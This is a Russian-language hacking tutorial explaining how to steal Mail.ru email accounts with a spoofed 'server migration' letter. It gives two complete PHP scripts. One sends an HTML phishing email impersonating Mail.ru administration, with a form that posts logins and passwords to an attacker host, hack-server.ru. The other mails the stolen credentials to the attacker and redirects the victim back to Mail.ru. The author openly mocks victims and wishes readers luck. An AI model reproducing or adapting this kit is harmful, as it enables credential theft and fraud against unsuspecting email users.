В этой статье я расскажу, как украсть электронную почту путём социальной инженерии, проще говоря, с помощью поддельного письма. Почтовые серверы постоянно совершенствуются, дырки в них латаются, но этот способ, чувствую, будет работать вечно, ибо не перевелись ещё на Руси дураки. В то же время не забываем про статьи 272 и 138, они всё ещё в действии. Но, к делу!
Для этого способа нам не понадобится никаких технических и программных средств – только прямые руки и голова. Смысл взлома прост – пользователь получает письмо, якобы от администрации почтового сервера с просьбой ввести в форме свои логин и пароль, поскольку «меняется оборудование». После того, как пользователь нажал кнопку отправить, все данные перелетают на другой сервер, после чего пользователь перенаправляется на mail.ru.
Самое главное – подделать письмо так, чтобы пользователь поверил, что оно настоящее. Для этого подделаем ящик , а само письмо должно содержать фразы типа «приносим свои извинения за доставленные неудобства».
Делаем письмо:
PHP код:
<?php
$subject="Внимание! Перенос вашего аккаунта на новый сервер!";
$header="Content-type: text/html; charset=windows-1251 \r\n";
$header.="From: Администрация Mail.Ru <
>\r\n";
$header.="Subject: $subject \r\n";
$header.="Content-type: text/html; charset=windows-1251 \r\n";
$msg="<body>
<table width=100% height=40 cellpadding=0 cellspacing=0 class=blue bgcolor='#00468C'>
<td class=vcor><img src=http://img.mail.ru/0.gif width=1 height=1></td>
<td class=logo><img src=http://img.mail.ru/r/blogs/prjlogo_mail.gif width=104 height=21></td>
<td width=100%> </td>
<td class=vcor><img src=http://img.mail.ru/0.gif width=1 height=1></td>
</table>
<br>
<b>Уважаемый пользователь
!</b><br>
От лица нашего интернет-холдинга Mail.ru мы просим извинения за причинение
вам некоторых неудобств.
В связи со сменой нашего оборудования на более новое нам нужно
перенести часть аккаунтов на новое оборудование.
Соответственно просим повторно прислать некоторую информацию о своем аккаунте.
Это нужно для предотвращения всякого рода ошибок и неточностей.<br>
<b><font color='#ff0000'>В противном случае Вы можете лишиться своего
почтового ящика!</font></b><br><br>
<b>Заполните нижеприведенную форму:</b>
<form method='post' action='http://hack-server.ru/form.php'>
<table width='400px' cellpadding=0 cellspacing=0>
<tr><td><b>Ваш Логин: </b></td><td><input type='text' name='login'>@mail.ru</td></tr>
<tr><td><b>Ваш Пароль: </b></td><td><input type='password' name='pass'></td></tr>
<tr><td><b>Подтвердите Ваш пароль: </b></td><td><input type='password' name='pass2'></td></tr>
<tr><td><b>Имя: </b></td><td><input type='text' name='name'></td></tr>
<tr><td><b>Фамилия: </b></td><td><input type='text' name='family'></td></tr>
</table>
<input type='submit' value='Отправить'>
</form>
Спасибо за то, что Вы являетесь пользователем Mail.Ru.<br>
С уважением, администрация Mail.ru
<br><br><br><br><br></body>";
mail('
', $subject, $msg, $header);?>
Пользователь получает примерно такое письмо:
Наивный пользователь заполняет все поля и отправляет письмо. А его данные переписываются в скрипт, который Вы напишете в теге form. Берём данные и кидаем лох...пользователя обратно:
PHP код:
<?php
$header="Content-type: text/html; charset=windows-1251 \r\n";
$header.="Content-type: text/html; charset=windows-1251 \r\n";
$msg = $_POST['login'];
$subject = 'логин: '.$_POST['login'].'<br>';
$subject .= 'пароль: '.$_POST['pass'].'<br>';
$subject .= 'имя: '.$_POST['name'].'<br>';
$subject .= 'фамалия: '.$_POST['family'];
mail("
", $msg, $subject, $header);
$location = $_SERVER['HTTP_REFERER'];
header("Location: http://win.mail.ru/cgi-bin/start?top=1");
?>
Если кто-то ещё не понял, то нам необходим сервак, с которого будем отправлять "письмо". Сервер должен поддерживать РНР и иметь бесплатный хостинг
. Ссылок не даю, а то совсем нечестно будет. Поищите, есть такие, есть. И ещё - способ довольно простой, так что ищите пользователей понаивнее. Удачи!